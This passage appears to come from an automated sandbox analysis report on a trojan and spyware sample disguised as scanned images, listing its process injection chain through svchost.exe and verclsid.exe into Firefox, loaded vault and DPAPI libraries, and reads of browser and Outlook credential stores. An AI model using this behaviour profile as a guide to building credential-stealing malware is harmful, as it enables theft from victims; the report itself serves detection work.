                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FF7B01_2_039FF7B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F16CC1_2_039F16CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039856301_2_03985630
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DD5B01_2_039DD5B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A095C31_2_03A095C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F75711_2_039F7571
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FF43F1_2_039FF43F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039314601_2_03931460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395FB801_2_0395FB80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B5BF01_2_039B5BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0397DBF91_2_0397DBF9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FFB761_2_039FFB76
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DDAAC1_2_039DDAAC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03985AA01_2_03985AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E1AA31_2_039E1AA3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039EDAC61_2_039EDAC6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FFA491_2_039FFA49
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F7A461_2_039F7A46
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B3A6C1_2_039B3A6C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D59101_2_039D5910
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039499501_2_03949950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395B9501_2_0395B950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039438E01_2_039438E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AD8001_2_039AD800
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03941F921_2_03941F92
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FFFB11_2_039FFFB1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03903FD21_2_03903FD2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03903FD51_2_03903FD5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FFF091_2_039FFF09
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03949EB01_2_03949EB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395FDC01_2_0395FDC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F1D5A1_2_039F1D5A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03943D401_2_03943D40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F7D731_2_039F7D73
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FFCF21_2_039FFCF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B9C321_2_039B9C32
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_050A05353_2_050A0535
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_051605913_2_05160591
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_051444203_2_05144420
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_051524463_2_05152446
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_0514E4F63_2_0514E4F6
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_050C47503_2_050C4750
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_050A07703_2_050A0770
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_0509C7C03_2_0509C7C0
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_050BC6E03_2_050BC6E0
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_050901003_2_05090100
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_0513A1183_2_0513A118
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_051281583_2_05128158
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_051541A23_2_051541A2
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_051601AA3_2_051601AA
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_051581CC3_2_051581CC
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_051320003_2_05132000
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_0515A3523_2_0515A352
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_051603E63_2_051603E6
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_050AE3F03_2_050AE3F0
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_051402743_2_05140274
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_051202C03_2_051202C0
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_050AAD003_2_050AAD00
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_0513CD1F3_2_0513CD1F
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_050B8DBF3_2_050B8DBF
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_0509ADE03_2_0509ADE0
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_050A0C003_2_050A0C00
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_05140CB53_2_05140CB5
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_05090CF23_2_05090CF2
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_05142F303_2_05142F30
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_050E2F283_2_050E2F28
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_050C0F303_2_050C0F30
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_05114F403_2_05114F40
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_0511EFA03_2_0511EFA0
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_05092FC83_2_05092FC8
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_0515EE263_2_0515EE26
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_050A0E593_2_050A0E59
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_0515CE933_2_0515CE93
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_050B2E903_2_050B2E90
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_0515EEDB3_2_0515EEDB
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_050B69623_2_050B6962
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_050A29A03_2_050A29A0
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_0516A9A63_2_0516A9A6
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_050A28403_2_050A2840
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_050AA8403_2_050AA840
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_050868B83_2_050868B8
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_050CE8F03_2_050CE8F0
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_0515AB403_2_0515AB40
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_05156BD73_2_05156BD7
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_0509EA803_2_0509EA80
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_051575713_2_05157571
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_0513D5B03_2_0513D5B0
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_051695C33_2_051695C3
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_0515F43F3_2_0515F43F
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_050914603_2_05091460
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_0515F7B03_2_0515F7B0
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_050E56303_2_050E5630
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_051516CC3_2_051516CC
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_050D516C3_2_050D516C
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_0508F1723_2_0508F172
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_0516B16B3_2_0516B16B
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_050AB1B03_2_050AB1B0
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_050A70C03_2_050A70C0
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_0514F0CC3_2_0514F0CC
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_0515F0E03_2_0515F0E0
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_051570E93_2_051570E9
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_0515132D3_2_0515132D
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_0508D34C3_2_0508D34C
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_050E739A3_2_050E739A
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_050A52A03_2_050A52A0
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_050BB2C03_2_050BB2C0
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_051412ED3_2_051412ED
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_050BD2F03_2_050BD2F0
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_050A3D403_2_050A3D40
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_05151D5A3_2_05151D5A
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_05157D733_2_05157D73
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_050BFDC03_2_050BFDC0
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_05119C323_2_05119C32
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_0515FCF23_2_0515FCF2
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_0515FF093_2_0515FF09
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_050A1F923_2_050A1F92
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_0515FFB13_2_0515FFB1
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_05063FD53_2_05063FD5
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_05063FD23_2_05063FD2
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_050A9EB03_2_050A9EB0
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_051359103_2_05135910
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_050A99503_2_050A9950
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_050BB9503_2_050BB950
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_0510D8003_2_0510D800
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_050A38E03_2_050A38E0
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_0515FB763_2_0515FB76
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_050BFB803_2_050BFB80
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_05115BF03_2_05115BF0
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_050DDBF93_2_050DDBF9
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_05157A463_2_05157A46
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_0515FA493_2_0515FA49
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_05113A6C3_2_05113A6C
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_050E5AA03_2_050E5AA0
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_05141AA33_2_05141AA3
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_0513DAAC3_2_0513DAAC
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_0514DAC63_2_0514DAC6
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_03031D903_2_03031D90
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_0302AF683_2_0302AF68
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_0302AF703_2_0302AF70
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_0302CEF03_2_0302CEF0
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_0302CCC73_2_0302CCC7
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_0302CCD03_2_0302CCD0
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_0303363B3_2_0303363B
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_030336403_2_03033640
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_030354103_2_03035410
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_0304BA803_2_0304BA80
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_04E0E6ED3_2_04E0E6ED
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_04E0D7B83_2_04E0D7B8
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_04E0E2383_2_04E0E238
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_04E0E3533_2_04E0E353
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_04E0CA783_2_04E0CA78
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_04E0CA3D3_2_04E0CA3D
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exeCode function: String function: 00470A30 appears 46 times
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exeCode function: String function: 0046F9F2 appears 31 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0392B970 appears 262 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03975130 appears 58 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 039AEA12 appears 86 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 039BF290 appears 103 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03987E54 appears 107 times
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: String function: 050E7E54 appears 107 times
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: String function: 0508B970 appears 262 times
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: String function: 0511F290 appears 103 times
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: String function: 0510EA12 appears 86 times
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: String function: 050D5130 appears 58 times
                Source: Scanned-IMGS_from NomanGroup IDT.scr.exe, 00000000.00000003.1699819205.0000000003CF3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Scanned-IMGS_from NomanGroup IDT.scr.exe
                Source: Scanned-IMGS_from NomanGroup IDT.scr.exe, 00000000.00000003.1702493783.000000000420D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Scanned-IMGS_from NomanGroup IDT.scr.exe
                Source: Scanned-IMGS_from NomanGroup IDT.scr.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@14/9
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exeCode function: 0_2_004C37B5 GetLastError,FormatMessageW,0_2_004C37B5
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exeCode function: 0_2_004B10BF AdjustTokenPrivileges,CloseHandle,0_2_004B10BF
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exeCode function: 0_2_004B16C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_004B16C3
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exeCode function: 0_2_004C51CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_004C51CD
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exeCode function: 0_2_004DA67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_004DA67C
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exeCode function: 0_2_004C648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,0_2_004C648E
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exeCode function: 0_2_004542A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_004542A2
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exeFile created: C:\Users\user\AppData\Local\Temp\peaksJump to behavior
                Source: Scanned-IMGS_from NomanGroup IDT.scr.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: verclsid.exe, 00000003.00000002.3548335775.00000000033E3000.00000004.00000020.00020000.00000000.sdmp, verclsid.exe, 00000003.00000002.3548335775.0000000003405000.00000004.00000020.00020000.00000000.sdmp, verclsid.exe, 00000003.00000003.2017590770.0000000003405000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: Scanned-IMGS_from NomanGroup IDT.scr.exeVirustotal: Detection: 36%
                Source: Scanned-IMGS_from NomanGroup IDT.scr.exeReversingLabs: Detection: 44%
                Source: unknownProcess created: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe "C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe"
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe"
                Source: C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exeProcess created: C:\Windows\SysWOW64\verclsid.exe "C:\Windows\SysWOW64\verclsid.exe"
                Source: C:\Windows\SysWOW64\verclsid.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe"Jump to behavior
                Source: C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exeProcess created: C:\Windows\SysWOW64\verclsid.exe "C:\Windows\SysWOW64\verclsid.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\verclsid.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\verclsid.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\verclsid.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\verclsid.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\verclsid.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\verclsid.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\verclsid.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\verclsid.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\verclsid.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\verclsid.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\verclsid.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\verclsid.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\verclsid.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\verclsid.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\verclsid.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\verclsid.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\verclsid.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\verclsid.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\verclsid.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\verclsid.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\verclsid.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\verclsid.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\verclsid.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\verclsid.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\verclsid.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
                Source: C:\Windows\SysWOW64\verclsid.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: Scanned-IMGS_from NomanGroup IDT.scr.exeStatic file information: File size 1613824 > 1048576
                Source: Scanned-IMGS_from NomanGroup IDT.scr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: Scanned-IMGS_from NomanGroup IDT.scr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: Scanned-IMGS_from NomanGroup IDT.scr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: Scanned-IMGS_from NomanGroup IDT.scr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Scanned-IMGS_from NomanGroup IDT.scr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: Scanned-IMGS_from NomanGroup IDT.scr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: Scanned-IMGS_from NomanGroup IDT.scr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: zalkpCfMwtnpQo.exe, 00000002.00000002.3547860890.000000000013E000.00000002.00000001.01000000.00000004.sdmp, zalkpCfMwtnpQo.exe, 00000007.00000002.3547855130.000000000013E000.00000002.00000001.01000000.00000004.sdmp
                Source: Binary string: wntdll.pdbUGP source: Scanned-IMGS_from NomanGroup IDT.scr.exe, 00000000.00000003.1699361176.0000000003BD0000.00000004.00001000.00020000.00000000.sdmp, Scanned-IMGS_from NomanGroup IDT.scr.exe, 00000000.00000003.1701122516.00000000040E0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1729825920.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1829963241.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1829963241.0000000003900000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1731375904.0000000003700000.00000004.00000020.00020000.00000000.sdmp, verclsid.exe, 00000003.00000003.1838981604.0000000004EB6000.00000004.00000020.00020000.00000000.sdmp, verclsid.exe, 00000003.00000002.3549867531.0000000005060000.00000040.00001000.00020000.00000000.sdmp, verclsid.exe, 00000003.00000002.3549867531.00000000051FE000.00000040.00001000.00020000.00000000.sdmp, verclsid.exe, 00000003.00000003.1836979825.0000000004D01000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: Scanned-IMGS_from NomanGroup IDT.scr.exe, 00000000.00000003.1699361176.0000000003BD0000.00000004.00001000.00020000.00000000.sdmp, Scanned-IMGS_from NomanGroup IDT.scr.exe, 00000000.00000003.1701122516.00000000040E0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000003.1729825920.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1829963241.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1829963241.0000000003900000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1731375904.0000000003700000.00000004.00000020.00020000.00000000.sdmp, verclsid.exe, verclsid.exe, 00000003.00000003.1838981604.0000000004EB6000.00000004.00000020.00020000.00000000.sdmp, verclsid.exe, 00000003.00000002.3549867531.0000000005060000.00000040.00001000.00020000.00000000.sdmp, verclsid.exe, 00000003.00000002.3549867531.00000000051FE000.00000040.00001000.00020000.00000000.sdmp, verclsid.exe, 00000003.00000003.1836979825.0000000004D01000.00000004.00000020.00020000.00000000.sdmp
